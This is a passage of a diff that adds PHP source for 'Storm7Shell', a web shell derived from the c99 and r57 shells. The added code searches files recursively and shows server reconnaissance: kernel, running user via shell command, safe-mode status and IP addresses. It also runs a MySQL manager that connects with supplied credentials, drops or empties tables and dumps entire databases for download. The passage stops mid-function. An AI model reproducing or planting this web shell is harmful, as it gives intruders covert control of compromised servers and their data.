+     $result["limit"] = $arr[$k+1]; 
+     $result["limit"] = explode(",",$result["limit"]); 
+     if (count($result["limit"]) == 1) {$result["limit"] = array(0,$result["limit"][0]);} 
+     unset($arr[$k],$arr[$k+1]); 
+    } 
+   } 
+  } 
+ } 
+ else {return FALSE;} 
+} 
+} 
+if (!function_exists("c99fsearch")) 
+{ 
+function c99fsearch($d) 
+{ 
+ global $found; 
+ global $found_d; 
+ global $found_f; 
+ global $search_i_f; 
+ global $search_i_d; 
+ global $a; 
+ if (substr($d,-1) != DIRECTORY_SEPARATOR) {$d .= DIRECTORY_SEPARATOR;} 
+ $h = opendir($d); 
+ while (($f = readdir($h)) !== FALSE) 
+ { 
+  if($f != "." && $f != "..") 
+  { 
+   $bool = (empty($a["name_regexp"]) and strpos($f,$a["name"]) !== FALSE) || ($a["name_regexp"] and ereg($a["name"],$f)); 
+   if (is_dir($d.$f)) 
+   { 
+    $search_i_d++; 
+    if (empty($a["text"]) and $bool) {$found[] = $d.$f; $found_d++;} 
+    if (!is_link($d.$f)) {c99fsearch($d.$f);} 
+   } 
+   else 
+   { 
+    $search_i_f++; 
+    if ($bool) 
+    { 
+     if (!empty($a["text"])) 
+     { 
+      $r = @file_get_contents($d.$f); 
+      if ($a["text_wwo"]) {$a["text"] = " ".trim($a["text"])." ";} 
+      if (!$a["text_cs"]) {$a["text"] = strtolower($a["text"]); $r = strtolower($r);} 
+      if ($a["text_regexp"]) {$bool = ereg($a["text"],$r);} 
+      else {$bool = strpos(" ".$r,$a["text"],1);} 
+      if ($a["text_not"]) {$bool = !$bool;} 
+      if ($bool) {$found[] = $d.$f; $found_f++;} 
+     } 
+     else {$found[] = $d.$f; $found_f++;} 
+    } 
+   } 
+  } 
+ } 
+ closedir($h); 
+} 
+} 
+if ($act == "gofile") {if (is_dir($f)) {$act = "ls"; $d = $f;} else {$act = "f"; $d = dirname($f); $f = basename($f);}} 
+//Sending headers 
+@ob_start(); 
+@ob_implicit_flush(0); 
+function onphpshutdown() 
+{ 
+ global $gzipencode,$ft; 
+ if (!headers_sent() and $gzipencode and !in_array($ft,array("img","download","notepad"))) 
+ { 
+  $v = @ob_get_contents(); 
+  @ob_end_clean(); 
+  @ob_start("ob_gzHandler"); 
+  echo $v; 
+  @ob_end_flush(); 
+ } 
+} 
+function c99shexit() 
+{ 
+ onphpshutdown(); 
+ exit; 
+} 
+header("Expires: Mon, 26 Jul 1997 05:00:00 GMT"); 
+header("Last-Modified: ".gmdate("D, d M Y H:i:s")." GMT"); 
+header("Cache-Control: no-store, no-cache, must-revalidate"); 
+header("Cache-Control: post-check=0, pre-check=0", FALSE); 
+header("Pragma: no-cache"); 
+if (empty($tmpdir)) 
+{ 
+ $tmpdir = ini_get("upload_tmp_dir"); 
+ if (is_dir($tmpdir)) {$tmpdir = "/tmp/";} 
+} 
+$tmpdir = realpath($tmpdir); 
+$tmpdir = str_replace("\\",DIRECTORY_SEPARATOR,$tmpdir); 
+if (substr($tmpdir,-1) != DIRECTORY_SEPARATOR) {$tmpdir .= DIRECTORY_SEPARATOR;} 
+if (empty($tmpdir_logs)) {$tmpdir_logs = $tmpdir;} 
+else {$tmpdir_logs = realpath($tmpdir_logs);} 
+if (@ini_get("safe_mode") or strtolower(@ini_get("safe_mode")) == "on") 
+{ 
+ $safemode = TRUE; 
+ $hsafemode = "<font color=red>ON (secure)</font>"; 
+} 
+else {$safemode = FALSE; $hsafemode = "<font color=green>OFF (not secure)</font>";} 
+$v = @ini_get("open_basedir"); 
+if ($v or strtolower($v) == "on") {$openbasedir = TRUE; $hopenbasedir = "<font color=red>".$v."</font>";} 
+else {$openbasedir = FALSE; $hopenbasedir = "<font color=green>OFF (not secure)</font>";} 
+$sort = htmlspecialchars($sort); 
+if (empty($sort)) {$sort = $sort_default;} 
+$sort[1] = strtolower($sort[1]); 
+$DISP_SERVER_SOFTWARE = getenv("SERVER_SOFTWARE"); 
+if (!ereg("PHP/".phpversion(),$DISP_SERVER_SOFTWARE)) {$DISP_SERVER_SOFTWARE .= ". PHP/".phpversion();} 
+$DISP_SERVER_SOFTWARE = str_replace("PHP/".phpversion(),"<a href=\"".$surl."act=phpinfo\" target=\"_blank\"><b><u>PHP/".phpversion()."</u></b></a>",htmlspecialchars($DISP_SERVER_SOFTWARE)); 
+@ini_set("highlight.bg",$highlight_bg); //FFFFFF 
+@ini_set("highlight.comment",$highlight_comment); //#FF8000 
+@ini_set("highlight.default",$highlight_default); //#0000BB 
+@ini_set("highlight.html",$highlight_html); //#000000 
+@ini_set("highlight.keyword",$highlight_keyword); //#007700 
+@ini_set("highlight.string",$highlight_string); //#DD0000 
+if (!is_array($actbox)) {$actbox = array();} 
+$dspact = $act = htmlspecialchars($act); 
+$disp_fullpath = $ls_arr = $notls = null; 
+$ud = urlencode($d); 
+// took the disabled functions from r57shell
+?><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1251"><meta http-equiv="Content-Language" content="en-us"><title><?php echo getenv("HTTP_HOST"); ?> - Storm7Shell</title><STYLE>TD { FONT-SIZE: 8pt; COLOR: #cc7700; FONT-FAMILY: verdana;}BODY { scrollbar-face-color: #cc7700; scrollbar-shadow-color: #000000; scrollbar-highlight-color: #00CC00; scrollbar-3dlight-color: #00CC00; scrollbar-darkshadow-color: #cc7700; scrollbar-track-color: #101010; scrollbar-arrow-color: #101010; font-family: Verdana;}TD.header { FONT-WEIGHT: normal; FONT-SIZE: 10pt; BACKGROUND: #000000; COLOR: green; FONT-FAMILY: verdana;}A { FONT-WEIGHT: normal; COLOR: #cc7700; FONT-FAMILY: verdana; TEXT-DECORATION: none;}A:unknown { FONT-WEIGHT: normal; COLOR: #f89521; FONT-FAMILY: verdana; TEXT-DECORATION: none;}A.Links { COLOR: #f89521; TEXT-DECORATION: none;}A.Links:unknown { FONT-WEIGHT: normal; COLOR: #f89521; TEXT-DECORATION: none;}A:hover { COLOR: #f89521; TEXT-DECORATION: bold;}.skin0{position:absolute; width:200px; border:2px solid black; background-color:menu; font-family:Verdana; line-height:20px; cursor:default; visibility:hidden;;}.skin1{cursor: default; font: menutext; position: absolute; width: 145px; background-color: menu; border: 1 solid buttonface;visibility:hidden; border: 2 outset buttonhighlight; font-family: Verdana,Geneva, Arial; font-size: 10px; color: black;}.menuitems{padding-left:15px; padding-right:10px;;}input{background-color: #cc7700; font-size: 8pt; color: #FFFFFF; font-family: Tahoma; border: 1 solid #666666;}textarea{background-color: #cc7700; font-size: 8pt; color: #FFFFFF; font-family: Tahoma; border: 1 solid #666666;}button{background-color: #cc7700; font-size: 8pt; color: #FFFFFF; font-family: Tahoma; border: 1 solid #666666;}select{background-color: #cc7700; font-size: 8pt; color: #FFFFFF; font-family: Tahoma; border: 1 solid #666666;}option {background-color: #cc7700; font-size: 8pt; color: #FFFFFF; font-family: Tahoma; border: 1 solid #666666;}iframe {background-color: #cc7700; font-size: 8pt; color: #FFFFFF; font-family: Tahoma; border: 1 solid #666666;}p {MARGIN-TOP: 0px; MARGIN-BOTTOM: 0px; LINE-HEIGHT: 150%}blockquote{ font-size: 8pt; font-family: Courier, Fixed, Arial; border : 8px solid #cc7700; padding: 1em; margin-top: 1em; margin-bottom: 5em; margin-right: 3em; margin-left: 4em; background-color: #cc7700;}body,td,th { font-family: verdana; color: #d9d9d9; font-size: 11px;}body { background-color: #000000;}</style></head><BODY text=#ffffff bottomMargin=0 bgColor=#000000 leftMargin=0 topMargin=0 rightMargin=0 marginheight=0 marginwidth=0><center><TABLE style="BORDER-COLLAPSE: collapse" height=1 cellSpacing=0 borderColorDark=#666666 cellPadding=5 width="100%" bgcolor=#000000 borderColorLight=#c0c0c0 border=1 bordercolor="#C0C0C0"><tr><th width="101%" height="15" nowrap bordercolor="#C0C0C0" valign="top" colspan="2"><p><center><img src='http://img232.imageshack.us/img232/9944/storm7shellnl0.png'></p></center></th></tr><tr><td>
+<table border=0 width=100%>
+<tr><td colspan=2><center><b><?php echo $DISP_SERVER_SOFTWARE; ?></td></tr>
+<tr><td><b>Kernel: <?php echo wordwrap(php_uname(),90,'<br>',1); if($win) echo ' ('.exec('ver').')'; ?></b></td><td align=right><b>Safe-Mode: <?php echo $hsafemode; ?></b></td></tr>
+<tr><td><b><?php if (!$win) {echo wordwrap(myshellexec('id'),90,'<br>',1);} else {echo 'Running As: '.get_current_user();} ?></b></td><td align=right><b>Disabled PHP Functions: <?php if(''==($df=@ini_get('disable_functions'))){echo '<font color=green>NONE</font></b>';}else{echo '<font color=red>$df</font></b>';} ?></b></td></tr>
+<tr><td><?php
+
+// ***
+$d = str_replace("\\",DIRECTORY_SEPARATOR,$d); 
+if (empty($d)) {$d = realpath(".");} elseif(realpath($d)) {$d = realpath($d);} 
+$d = str_replace("\\",DIRECTORY_SEPARATOR,$d); 
+if (substr($d,-1) != DIRECTORY_SEPARATOR) {$d .= DIRECTORY_SEPARATOR;} 
+$d = str_replace("\\\\","\\",$d); 
+$dispd = htmlspecialchars($d); 
+$pd = $e = explode(DIRECTORY_SEPARATOR,substr($d,0,-1)); 
+$i = 0; 
+// ***
+
+if (is_callable('disk_free_space')) 
+{
+ $free = disk_free_space($d);
+ $total = disk_total_space($d);
+ if ($free === FALSE) {$free = 0;}
+ if ($total === FALSE) {$total = 0;}
+ if ($free < 0) {$free = 0;}
+ if ($total < 0) {$total = 0;}
+ $used = $total-$free;
+ $free_percent = round(100/($total/$free),2);
+ echo '<b>Free '.view_size($free).' of '.view_size($total).' ('.$free_percent.'%)</b>';
+}
+echo '</td><td align=right><b>Server IP: <a href=http://whois.domaintools.com/'.gethostbyname($_SERVER["HTTP_HOST"]).'>'.gethostbyname($_SERVER["HTTP_HOST"]).'</a> - Your IP: <a href=http://whois.domaintools.com/'.$_SERVER["REMOTE_ADDR"].'>'.$_SERVER["REMOTE_ADDR"].'</a></b></td></tr>';
+?>
+</table>
+<br>
+<p align="left"><?php 
+// moved the dir stuff up above the disk free space so that it still gets the variables, even though it's being called before the echo current dir (put *** around it)
+foreach($pd as $b) 
+{ 
+ $t = ''; 
+ $j = 0; 
+ foreach ($e as $r) 
+ { 
+  $t.= $r.DIRECTORY_SEPARATOR; 
+  if ($j == $i) {break;} 
+  $j++; 
+ } 
+ echo '<a href="'.$surl.'act=ls&d='.urlencode($t).'&sort='.$sort.'"><b>'.htmlspecialchars($b).DIRECTORY_SEPARATOR.'</b></a>'; 
+ $i++; 
+}
+echo '&nbsp;&nbsp;&nbsp;';
+if (is_writable($d)) 
+{ 
+ $wd = TRUE; 
+ $wdt = "<font color=green>[ ok ]</font>"; 
+ echo "<b><font color=green>".view_perms(fileperms($d))."</font></b>"; 
+} 
+else 
+{ 
+ $wd = FALSE; 
+ $wdt = "<font color=red>[ Read-Only ]</font>"; 
+ echo '<b>'.view_perms_color($d).'</b>'; 
+}
+
+echo '<br>';
+$letters = ''; 
+if ($win) 
+{ 
+ $v = explode("\\",$d); 
+ $v = $v[0]; 
+ foreach (range('a','z') as $letter) 
+ { 
+  $bool = $isdiskette = in_array($letter,$safemode_diskettes);
+  if (!$bool) {$bool = is_dir($letter.":\\");}
+  if ($bool)
+  {
+   $letters .= "<a href=\"".$surl."act=ls&d=".urlencode(strtoupper($letter).":\\")."\"".($isdiskette?" onclick=\"return confirm('Make sure that the diskette is inserted properly, otherwise an error may occur.')\"":"").">["; 
+   if ($letter.":" != $v) {$letters .= strtoupper($letter);}
+   else {$letters .= '<font color=green>'.strtoupper($letter).'</font>';}
+   $letters .= ":]</a> "; 
+  } 
+ } 
+ if (!empty($letters)) {echo "<b>Detected drives</b>: ".$letters."<br>";} 
+} 
+if (count($quicklaunch) > 0) 
+{ 
+ foreach($quicklaunch as $item) 
+ { 
+  $item[1] = str_replace("%d",urlencode($d),$item[1]); 
+  $item[1] = str_replace("%sort",$sort,$item[1]); 
+  $v = realpath($d.".."); 
+  if (empty($v)) {$a = explode(DIRECTORY_SEPARATOR,$d); unset($a[count($a)-2]); $v = join(DIRECTORY_SEPARATOR,$a);} 
+  $item[1] = str_replace("%upd",urlencode($v),$item[1]); 
+  echo "<a href=\"".$item[1]."\">".$item[0]."</a>&nbsp;&nbsp;&nbsp;&nbsp;"; 
+ } 
+} 
+if (count($quicklaunch2) > 0) 
+{ 
+echo '<br>';
+ foreach($quicklaunch2 as $item) 
+ { 
+  $item[1] = str_replace("%d",urlencode($d),$item[1]); 
+  $item[1] = str_replace("%sort",$sort,$item[1]); 
+  $v = realpath($d.".."); 
+  if (empty($v)) {$a = explode(DIRECTORY_SEPARATOR,$d); unset($a[count($a)-2]); $v = join(DIRECTORY_SEPARATOR,$a);} 
+  $item[1] = str_replace("%upd",urlencode($v),$item[1]); 
+  echo "<a href=\"".$item[1]."\">".$item[0]."</a>&nbsp;&nbsp;&nbsp;&nbsp;"; 
+ } 
+} 
+
+echo "</p></td></tr></table><br>"; 
+if ((!empty($donated_html)) and (in_array($act,$donated_act))) {echo "<TABLE style=\"BORDER-COLLAPSE: collapse\" cellSpacing=0 borderColorDark=#666666 cellPadding=5 width=\"100%\" bgcolor=#000000 borderColorLight=#c0c0c0 border=1><tr><td width=\"100%\" valign=\"top\">".$donated_html."</td></tr></table><br>";} 
+echo "<TABLE style=\"BORDER-COLLAPSE: collapse\" cellSpacing=0 borderColorDark=#666666 cellPadding=5 width=\"100%\" bgcolor=#000000 borderColorLight=#c0c0c0 border=1><tr><td width=\"100%\" valign=\"top\">"; 
+if ($act == "") {$act = $dspact = "ls";} 
+if ($act == "sql") 
+{ 
+ $sql_surl = $surl."act=sql"; 
+ if ($sql_login)  {$sql_surl .= "&sql_login=".htmlspecialchars($sql_login);} 
+ if ($sql_passwd) {$sql_surl .= "&sql_passwd=".htmlspecialchars($sql_passwd);} 
+ if ($sql_server) {$sql_surl .= "&sql_server=".htmlspecialchars($sql_server);} 
+ if ($sql_port)   {$sql_surl .= "&sql_port=".htmlspecialchars($sql_port);} 
+ if ($sql_db)     {$sql_surl .= "&sql_db=".htmlspecialchars($sql_db);} 
+ $sql_surl .= "&"; 
+ ?><h3>Attention! SQL-Manager is <u>NOT</u> ready module! Don't reports bugs.</h3><TABLE style="BORDER-COLLAPSE: collapse" height=1 cellSpacing=0 borderColorDark=#666666 cellPadding=5 width="100%" bgcolor=#000000 borderColorLight=#c0c0c0 border=1 bordercolor="#C0C0C0"><tr><td width="100%" height="1" colspan="2" valign="top"><center><?php 
+ if ($sql_server) 
+ { 
+  $sql_sock = mysql_connect($sql_server.":".$sql_port, $sql_login, $sql_passwd); 
+  $err = mysql_smarterror(); 
+  @mysql_select_db($sql_db,$sql_sock); 
+  if ($sql_query and $submit) {$sql_query_result = mysql_query($sql_query,$sql_sock); $sql_query_error = mysql_smarterror();} 
+ } 
+ else {$sql_sock = FALSE;} 
+ echo "<b>SQL Manager:</b><br>"; 
+ if (!$sql_sock) 
+ { 
+  if (!$sql_server) {echo "NO CONNECTION";} 
+  else {echo "<center><b>Can't connect</b></center>"; echo "<b>".$err."</b>";} 
+ } 
+ else 
+ { 
+  $sqlquicklaunch = array(); 
+  $sqlquicklaunch[] = array("Index",$surl."act=sql&sql_login=".htmlspecialchars($sql_login)."&sql_passwd=".htmlspecialchars($sql_passwd)."&sql_server=".htmlspecialchars($sql_server)."&sql_port=".htmlspecialchars($sql_port)."&"); 
+  $sqlquicklaunch[] = array("Query",$sql_surl."sql_act=query&sql_tbl=".urlencode($sql_tbl)); 
+  $sqlquicklaunch[] = array("Server-status",$surl."act=sql&sql_login=".htmlspecialchars($sql_login)."&sql_passwd=".htmlspecialchars($sql_passwd)."&sql_server=".htmlspecialchars($sql_server)."&sql_port=".htmlspecialchars($sql_port)."&sql_act=serverstatus"); 
+  $sqlquicklaunch[] = array("Server variables",$surl."act=sql&sql_login=".htmlspecialchars($sql_login)."&sql_passwd=".htmlspecialchars($sql_passwd)."&sql_server=".htmlspecialchars($sql_server)."&sql_port=".htmlspecialchars($sql_port)."&sql_act=servervars"); 
+  $sqlquicklaunch[] = array("Processes",$surl."act=sql&sql_login=".htmlspecialchars($sql_login)."&sql_passwd=".htmlspecialchars($sql_passwd)."&sql_server=".htmlspecialchars($sql_server)."&sql_port=".htmlspecialchars($sql_port)."&sql_act=processes"); 
+  $sqlquicklaunch[] = array("Logout",$surl."act=sql"); 
+  echo "<center><b>MySQL ".mysql_get_server_info()." (proto v.".mysql_get_proto_info ().") running in ".htmlspecialchars($sql_server).":".htmlspecialchars($sql_port)." as ".htmlspecialchars($sql_login)."@".htmlspecialchars($sql_server)." (password - \"".htmlspecialchars($sql_passwd)."\")</b><br>"; 
+  if (count($sqlquicklaunch) > 0) {foreach($sqlquicklaunch as $item) {echo "[ <a href=\"".$item[1]."\"><b>".$item[0]."</b></a> ] ";}} 
+  echo "</center>"; 
+ } 
+ echo "</td></tr><tr>"; 
+ if (!$sql_sock) {?><td width=28% height=100 valign=top><li>If login is null, login is owner of process.<li>If host is null, host is localhost (default).</b><li>If port is null, port is 3306 (default).</td><td width=90% height=1 valign=top><TABLE height=1 cellSpacing=0 cellPadding=0 width=100% border=0><tr><td>&nbsp;<b>Please, fill the form:</b><table><tr><td><b>Username</b></td><td><b>Password</b></td><td><b>Database</b></td></tr><form action="<?php echo $surl; ?>" method=POST><input type=hidden name="act" value="sql"><tr><td><input type=text name="sql_login" value="root" maxlength=64></td><td><input type=text name="sql_passwd" maxlength=64></td><td><input type=text name="sql_db" maxlength=64></td></tr><tr><td><b>Host</b></td><td><b>Port</b></td></tr><tr><td align=right><input type=text name="sql_server" value="localhost" maxlength=64></td><td><input type=text name="sql_port" value="3306" maxlength=6 size=3></td><td><input type=submit value="Connect"></td></tr><tr><td></td></tr></form></table></td><?php }
+ else 
+ { 
+  //Start left panel 
+  if (!empty($sql_db)) 
+  { 
+   ?><td width="25%" height="100%" valign="top"><a href="<?php echo $surl."act=sql&sql_login=".htmlspecialchars($sql_login)."&sql_passwd=".htmlspecialchars($sql_passwd)."&sql_server=".htmlspecialchars($sql_server)."&sql_port=".htmlspecialchars($sql_port)."&"; ?>"><b>Home</b></a><hr size="1" noshade><?php 
+   $result = mysql_list_tables($sql_db); 
+   if (!$result) {echo mysql_smarterror();} 
+   else 
+   { 
+    echo "---[ <a href=\"".$sql_surl."&\"><b>".htmlspecialchars($sql_db)."</b></a> ]---<br>"; 
+    $c = 0; 
+    while ($row = mysql_fetch_array($result)) {$count = mysql_query ("SELECT COUNT(*) FROM ".$row[0]); $count_row = mysql_fetch_array($count); echo "<b>+&nbsp;<a href=\"".$sql_surl."sql_db=".htmlspecialchars($sql_db)."&sql_tbl=".htmlspecialchars($row[0])."\"><b>".htmlspecialchars($row[0])."</b></a> (".$count_row[0].")</br></b>"; mysql_free_result($count); $c++;} 
+    if (!$c) {echo "No tables found in database.";} 
+   } 
+  } 
+  else 
+  { 
+   ?><td width="1" height="100" valign="top"><a href="<?php echo $sql_surl; ?>"><b>Home</b></a><hr size="1" noshade><?php 
+   $result = mysql_list_dbs($sql_sock); 
+   if (!$result) {echo mysql_smarterror();} 
+   else 
+   { 
+    ?><form action="<?php echo $surl; ?>"><input type="hidden" name="act" value="sql"><input type="hidden" name="sql_login" value="<?php echo htmlspecialchars($sql_login); ?>"><input type="hidden" name="sql_passwd" value="<?php echo htmlspecialchars($sql_passwd); ?>"><input type="hidden" name="sql_server" value="<?php echo htmlspecialchars($sql_server); ?>"><input type="hidden" name="sql_port" value="<?php echo htmlspecialchars($sql_port); ?>"><select name="sql_db"><?php 
+    $c = 0; 
+    $dbs = ""; 
+    while ($row = mysql_fetch_row($result)) {$dbs .= "<option value=\"".$row[0]."\""; if ($sql_db == $row[0]) {$dbs .= " selected";} $dbs .= ">".$row[0]."</option>"; $c++;} 
+    echo "<option value=\"\">Databases (".$c.")</option>"; 
+    echo $dbs; 
+   } 
+   ?></select><hr size="1" noshade>Please, select database<hr size="1" noshade><input type="submit" value="Go"></form><?php 
+  } 
+  //End left panel 
+  echo "</td><td width=\"100%\" height=\"1\" valign=\"top\">"; 
+  //Start center panel 
+  $diplay = TRUE; 
+  if ($sql_db) 
+  { 
+   if (!is_numeric($c)) {$c = 0;} 
+   if ($c == 0) {$c = "no";} 
+   echo "<hr size=\"1\" noshade><center><b>There are ".$c." table(s) in this DB (".htmlspecialchars($sql_db).").<br>"; 
+   if (count($dbquicklaunch) > 0) {foreach($dbsqlquicklaunch as $item) {echo "[ <a href=\"".$item[1]."\">".$item[0]."</a> ] ";}} 
+   echo "</b></center>"; 
+   $acts = array("","dump"); 
+   if ($sql_act == "tbldrop") {$sql_query = "DROP TABLE"; foreach($boxtbl as $v) {$sql_query .= "\n`".$v."` ,";} $sql_query = substr($sql_query,0,-1).";"; $sql_act = "query";} 
+   elseif ($sql_act == "tblempty") {$sql_query = ""; foreach($boxtbl as $v) {$sql_query .= "DELETE FROM `".$v."` \n";} $sql_act = "query";} 
+   elseif ($sql_act == "tbldump") {if (count($boxtbl) > 0) {$dmptbls = $boxtbl;} elseif($thistbl) {$dmptbls = array($sql_tbl);} $sql_act = "dump";} 
+   elseif ($sql_act == "tblcheck") {$sql_query = "CHECK TABLE"; foreach($boxtbl as $v) {$sql_query .= "\n`".$v."` ,";} $sql_query = substr($sql_query,0,-1).";"; $sql_act = "query";} 
+   elseif ($sql_act == "tbloptimize") {$sql_query = "OPTIMIZE TABLE"; foreach($boxtbl as $v) {$sql_query .= "\n`".$v."` ,";} $sql_query = substr($sql_query,0,-1).";"; $sql_act = "query";} 
+   elseif ($sql_act == "tblrepair") {$sql_query = "REPAIR TABLE"; foreach($boxtbl as $v) {$sql_query .= "\n`".$v."` ,";} $sql_query = substr($sql_query,0,-1).";"; $sql_act = "query";} 
+   elseif ($sql_act == "tblanalyze") {$sql_query = "ANALYZE TABLE"; foreach($boxtbl as $v) {$sql_query .= "\n`".$v."` ,";} $sql_query = substr($sql_query,0,-1).";"; $sql_act = "query";} 
+   elseif ($sql_act == "deleterow") {$sql_query = ""; if (!empty($boxrow_all)) {$sql_query = "DELETE * FROM `".$sql_tbl."`;";} else {foreach($boxrow as $v) {$sql_query .= "DELETE * FROM `".$sql_tbl."` WHERE".$v." LIMIT 1;\n";} $sql_query = substr($sql_query,0,-1);} $sql_act = "query";} 
+   elseif ($sql_tbl_act == "insert") 
+   { 
+    if ($sql_tbl_insert_radio == 1) 
+    { 
+     $keys = ""; 
+     $akeys = array_keys($sql_tbl_insert); 
+     foreach ($akeys as $v) {$keys .= "`".addslashes($v)."`, ";} 
+     if (!empty($keys)) {$keys = substr($keys,0,strlen($keys)-2);} 
+     $values = ""; 
+     $i = 0; 
+     foreach (array_values($sql_tbl_insert) as $v) {if ($funct = $sql_tbl_insert_functs[$akeys[$i]]) {$values .= $funct." (";} $values .= "'".addslashes($v)."'"; if ($funct) {$values .= ")";} $values .= ", "; $i++;} 
+     if (!empty($values)) {$values = substr($values,0,strlen($values)-2);} 
+     $sql_query = "INSERT INTO `".$sql_tbl."` ( ".$keys." ) VALUES ( ".$values." );"; 
+     $sql_act = "query"; 
+     $sql_tbl_act = "browse"; 
+    } 
+    elseif ($sql_tbl_insert_radio == 2) 
+    { 
+     $set = mysql_buildwhere($sql_tbl_insert,", ",$sql_tbl_insert_functs); 
+     $sql_query = "UPDATE `".$sql_tbl."` SET ".$set." WHERE ".$sql_tbl_insert_q." LIMIT 1;"; 
+     $result = mysql_query($sql_query) or print(mysql_smarterror()); 
+     $result = mysql_fetch_array($result, MYSQL_ASSOC); 
+     $sql_act = "query"; 
+     $sql_tbl_act = "browse"; 
+    } 
+   } 
+   if ($sql_act == "query") 
+   { 
+    echo "<hr size=\"1\" noshade>"; 
+    if (($submit) and (!$sql_query_result) and ($sql_confirm)) {if (!$sql_query_error) {$sql_query_error = "Query was empty";} echo "<b>Error:</b> <br>".$sql_query_error."<br>";} 
+    if ($sql_query_result or (!$sql_confirm)) {$sql_act = $sql_goto;} 
+    if ((!$submit) or ($sql_act)) {echo "<table border=\"0\" width=\"100%\" height=\"1\"><tr><td><form action=\"".$sql_surl."\" method=\"POST\"><b>"; if (($sql_query) and (!$submit)) {echo "Do you really want to:";} else {echo "SQL-Query :";} echo "</b><br><br><textarea name=\"sql_query\" cols=\"100\" rows=\"10\">".htmlspecialchars($sql_query)."</textarea><br><br><input type=\"hidden\" name=\"sql_act\" value=\"query\"><input type=\"hidden\" name=\"sql_tbl\" value=\"".htmlspecialchars($sql_tbl)."\"><input type=\"hidden\" name=\"submit\" value=\"1\"><input type=\"hidden\" name=\"sql_goto\" value=\"".htmlspecialchars($sql_goto)."\"><input type=\"submit\" name=\"sql_confirm\" value=\"Yes\">&nbsp;<input type=\"submit\" value=\"No\"></form></td></tr></table>";} 
+   } 
+   if (in_array($sql_act,$acts)) 
+   { 
+    ?><table border="0" width="100%" height="1"><tr><td width="30%" height="1"><b>Create new table:</b><form action="<?php echo $surl; ?>"><input type="hidden" name="act" value="sql"><input type="hidden" name="sql_act" value="newtbl"><input type="hidden" name="sql_db" value="<?php echo htmlspecialchars($sql_db); ?>"><input type="hidden" name="sql_login" value="<?php echo htmlspecialchars($sql_login); ?>"><input type="hidden" name="sql_passwd" value="<?php echo htmlspecialchars($sql_passwd); ?>"><input type="hidden" name="sql_server" value="<?php echo htmlspecialchars($sql_server); ?>"><input type="hidden" name="sql_port" value="<?php echo htmlspecialchars($sql_port); ?>"><input type="text" name="sql_newtbl" size="20">&nbsp;<input type="submit" value="Create"></form></td><td width="30%" height="1"><b>Dump DB:</b><form action="<?php echo $surl; ?>"><input type="hidden" name="act" value="sql"><input type="hidden" name="sql_act" value="dump"><input type="hidden" name="sql_db" value="<?php echo htmlspecialchars($sql_db); ?>"><input type="hidden" name="sql_login" value="<?php echo htmlspecialchars($sql_login); ?>"><input type="hidden" name="sql_passwd" value="<?php echo htmlspecialchars($sql_passwd); ?>"><input type="hidden" name="sql_server" value="<?php echo htmlspecialchars($sql_server); ?>"><input type="hidden" name="sql_port" value="<?php echo htmlspecialchars($sql_port); ?>"><input type="text" name="dump_file" size="30" value="<?php echo "dump_".getenv("SERVER_NAME")."_".$sql_db."_".date("d-m-Y-H-i-s").".sql"; ?>">&nbsp;<input type="submit" name=\"submit\" value="Dump"></form></td><td width="30%" height="1"></td></tr><tr><td width="30%" height="1"></td><td width="30%" height="1"></td><td width="30%" height="1"></td></tr></table><?php 
+    if (!empty($sql_act)) {echo "<hr size=\"1\" noshade>";} 
+    if ($sql_act == "newtbl") 
+    { 
+
+     echo "<b>"; 
+     if ((mysql_create_db ($sql_newdb)) and (!empty($sql_newdb))) {echo "DB \"".htmlspecialchars($sql_newdb)."\" has been created with success!</b><br>"; 
+    } 
+    else {echo "Can't create DB \"".htmlspecialchars($sql_newdb)."\".<br>Reason:</b> ".mysql_smarterror();} 
+   } 
+   elseif ($sql_act == "dump") 
+   { 
+    if (empty($submit)) 
+    { 
+     $diplay = FALSE; 
+     echo "<form method=\"GET\"><input type=\"hidden\" name=\"act\" value=\"sql\"><input type=\"hidden\" name=\"sql_act\" value=\"dump\"><input type=\"hidden\" name=\"sql_db\" value=\"".htmlspecialchars($sql_db)."\"><input type=\"hidden\" name=\"sql_login\" value=\"".htmlspecialchars($sql_login)."\"><input type=\"hidden\" name=\"sql_passwd\" value=\"".htmlspecialchars($sql_passwd)."\"><input type=\"hidden\" name=\"sql_server\" value=\"".htmlspecialchars($sql_server)."\"><input type=\"hidden\" name=\"sql_port\" value=\"".htmlspecialchars($sql_port)."\"><input type=\"hidden\" name=\"sql_tbl\" value=\"".htmlspecialchars($sql_tbl)."\"><b>SQL-Dump:</b><br><br>"; 
+     echo "<b>DB:</b>&nbsp;<input type=\"text\" name=\"sql_db\" value=\"".urlencode($sql_db)."\"><br><br>"; 
+     $v = join (";",$dmptbls); 
+     echo "<b>Only tables (explode \";\")&nbsp;<b><sup>1</sup></b>:</b>&nbsp;<input type=\"text\" name=\"dmptbls\" value=\"".htmlspecialchars($v)."\" size=\"".(strlen($v)+5)."\"><br><br>"; 
+     if ($dump_file) {$tmp = $dump_file;} 
+     else {$tmp = htmlspecialchars("./dump_".getenv("SERVER_NAME")."_".$sql_db."_".date("d-m-Y-H-i-s").".sql");} 
+     echo "<b>File:</b>&nbsp;<input type=\"text\" name=\"sql_dump_file\" value=\"".$tmp."\" size=\"".(strlen($tmp)+strlen($tmp) % 30)."\"><br><br>"; 
+     echo "<b>Download: </b>&nbsp;<input type=\"checkbox\" name=\"sql_dump_download\" value=\"1\" checked><br><br>"; 
+     echo "<b>Save to file: </b>&nbsp;<input type=\"checkbox\" name=\"sql_dump_savetofile\" value=\"1\" checked>"; 
+     echo "<br><br><input type=\"submit\" name=\"submit\" value=\"Dump\"><br><br><b><sup>1</sup></b> - all, if empty"; 
+     echo "</form>"; 
+    } 
+    else 
+    { 
+     $diplay = TRUE; 
+     $set = array(); 
+     $set["sock"] = $sql_sock; 
+     $set["db"] = $sql_db; 
+     $dump_out = "download"; 
+     $set["print"] = 0; 
+     $set["nl2br"] = 0; 
+     $set[""] = 0; 
+     $set["file"] = $dump_file; 
+     $set["add_drop"] = TRUE; 
+     $set["onlytabs"] = array(); 
+     if (!empty($dmptbls)) {$set["onlytabs"] = explode(";",$dmptbls);} 
+     $ret = mysql_dump($set); 
+     if ($sql_dump_download) 
+     { 
+      @ob_clean(); 
+      header("Content-type: application/octet-stream"); 
+      header("Content-length: ".strlen($ret)); 
+      header("Content-disposition: attachment; filename=\"".basename($sql_dump_file)."\";"); 
+      echo $ret; 
+      exit; 
+     } 
+     elseif ($sql_dump_savetofile) 
+     { 
+      $fp = fopen($sql_dump_file,"w"); 
+      if (!$fp) {echo "<b>Dump error! Can't write to \"".htmlspecialchars($sql_dump_file)."\"!";} 
+      else 
+      { 
